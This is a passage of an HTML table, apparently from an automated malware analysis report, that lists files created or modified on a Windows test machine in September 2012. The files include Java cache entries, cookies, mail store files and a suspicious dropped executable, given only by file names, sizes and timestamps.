</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\35</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\36</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\37</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\38</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\39</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\4</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\40</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\41</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\42</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\43</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\44</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\45</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\46</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\47</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\48</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\49</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\5</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\50</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\51</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\52</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\53</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\54</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\55</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\56</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\57</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\58</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\59</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\6</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\60</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\61</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\62</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\63</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\7</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\8</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\9</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\lastAccessed</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:18 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\GTT5VL6M.txt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:58 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\HR7RSVJY.txt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:37 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\OCZY31FB.txt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:38 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\SQUKNA2Q.txt</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:18 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Folders.dbx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">76KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:40 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Inbox.dbx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">143KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:39 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Offline.dbx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">10KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:40 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Microsoft\Outlook Express\Sent Items.dbx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">77KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:39 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{8CFA7582-04D2-11E2-A16C-08002765500A}.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">5KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{8CFA7583-04D2-11E2-A16C-08002765500A}.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">28KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:27 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{B1CEB060-04D2-11E2-A16C-08002765500A}.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:24 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{CE9EB670-04D2-11E2-A16C-08002765500A}.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">12KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:44 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{E0F1E810-04D2-11E2-A16C-08002765500A}.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">12KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:03 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{ED37A190-04D2-11E2-A16C-08002765500A}.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">4KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:17 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temp\au-descriptor-1.6.0_35-b10.xml</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">8KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:11 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temp\V.class</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">7KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:03 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;"><b>C:\Documents and Settings\bomber\Local Settings\Temp\wgsdgsdgdsgsd.exe</b></span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">289KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:06 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temp\wireshark_D6F459B6-57F0-41B4-99AF-16CEB1102BB5_20120922123113_a02096</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1,026KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:32:07 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temp\wireshark_D6F459B6-57F0-41B4-99AF-16CEB1102BB5_20120922123320_a03904</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1,999KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;"><b>C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\1864</b></span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">66KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:18 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;"><b>C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\2424</b></span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">66KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:59 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\de[1].png</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:41 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\domainmap[3].gif</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:59 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\hcp_asx[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\hcp_asx[2].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:02 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\login[2].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">12KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:37 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\ro[1].png</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:42 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCA5PUYED</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCA704DOF</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
